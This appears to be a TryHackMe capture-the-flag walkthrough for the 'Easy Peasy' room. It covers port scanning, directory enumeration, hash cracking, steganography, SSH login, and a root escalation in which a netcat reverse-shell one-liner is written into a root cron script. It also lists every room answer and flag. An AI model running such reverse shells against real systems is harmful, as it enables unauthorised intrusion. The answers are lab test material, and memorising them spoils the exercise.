Room Link : https://tryhackme.com/r/room/easypeasyctf
STEP1
nmap -p- -Pn -A -T4 -sSV 10.10.209.133
FINDING
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-robots.txt: 1 disallowed entry
|_http-title: Welcome to nginx!
6498/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
65524/tcp open http Apache httpd 2.4.43 ((Ubuntu))
|_http-server-header: Apache/2.4.43 (Ubuntu)
|_http-robots.txt: 1 disallowed entry
QUESTION
How many ports are open?
3
QUESTION
What is the version of nginx?
1.16.1
QUESTION
What is running on the highest port?
Apache
--------------------------------------------------------------------------------------------------------
STEP2
dirb http://10.10.209.133
FINDING
---- Entering directory: http://10.10.209.133/hidden/whatever/
---- Go to page sourse you will find p hiddenZmxhZ3tmMXJzN19mbDRnfQ==/p
---- use https://hashes.com/en/decrypt/hash to crack ZmxhZ3tmMXJzN19mbDRnfQ==
QUESTION
Using GoBuster, find flag 1.
flag{f1rs7_fl4g}
--------------------------------------------------------------------------------------------------------
STEP3
dirb http://10.10.209.133:65524/
http://10.10.209.133:65524/robots.txt
FINDING
+ http://10.10.209.133:65524/robots.txt (CODE:200|SIZE:153)
User-Agent:a18672860d0510e5ab6699730763b250
---- use https://md5hashing.net/hash/md5/a18672860d0510e5ab6699730763b250 to crack and get flag{1m_s3c0nd_fl4g}
QUESTION
Further enumerate the machine, what is flag 2?
flag{1m_s3c0nd_fl4g}
--------------------------------------------------------------------------------------------------------
STEP3
dirb http://10.10.209.133:65524/
http://10.10.209.133:65524/
FINDING
+ http://10.10.209.133:65524/index.html (CODE:200|SIZE:10818)
you will find flag3 on the page
---- use https://hashes.com/en/decrypt/hash to crack 9fdafbd64c47471a8f54cd3fc64cd312 is candeger
QUESTION
Crack the hash with easypeasy.txt, What is the flag 3?
flag{9fdafbd64c47471a8f54cd3fc64cd312}
--------------------------------------------------------------------------------------------------------
STEP4
dirb http://10.10.209.133:65524/
http://10.10.209.133:65524/
---- go to page sourse nd get p hiddenits encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu/p
FINDING
+ http://10.10.209.133:65524/index.html (CODE:200|SIZE:10818)
https://www.better-converter.com/Encoders-Decoders/Base62-Decode and decode ObsJmP173N2X6dOrAgEAL0Vu and get
/n0th1ng3ls3m4tt3r
What is the hidden directory?
/n0th1ng3ls3m4tt3r
--------------------------------------------------------------------------------------------------------
STEP5
http://10.10.209.133:65524/n0th1ng3ls3m4tt3r/
---- go to page sourse and get p940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81/p
---- use https://md5hashing.net/hash/gost/940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81 to get mypasswordforthatjob
FINDING
download the image on top middle
---- use steghide extract -sf binarycodepixabay.jpg
---- with passphrase mypasswordforthatjob
---- get a file secrettext.txt on Desktop
QUESTION
Using the wordlist that provided to you in this task crack the hash
what is the password?
mypasswordforthatjob
--------------------------------------------------------------------------------------------------------
STEP6
---- open secrettext.txt
FINDING
username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
---- use https://www.morsecodeninja.com/binary.html
---- password : iconvertedmypasswordtobinary
QUESTION
What is the password to login to the machine via SSH?
iconvertedmypasswordtobinary
--------------------------------------------------------------------------------------------------------
STEP7
ssh [email protected] -p 6498
password : iconvertedmypasswordtobinary
ls -la
cat user.txt
QUESTION
What is the user flag?
flag{n0wits33msn0rm4l}
--------------------------------------------------------------------------------------------------------
STEP8
cat /etc/crontab
FINDING
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
echo rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc 10.0.0.1 1234 /tmp/f /var/www/.mysecretcronjob.sh
open ---- nc -nvlp 1234 listner on new terminal
on ssh terminal execute /var/www/./.mysecretcronjob.sh
on new terminal
cd /root
cat .root.txt
QUESTION
What is the root flag?
flag{63a9f0ea7bb98050796b649e85481845}
--------------------------------------------------------------------------------------------------------
|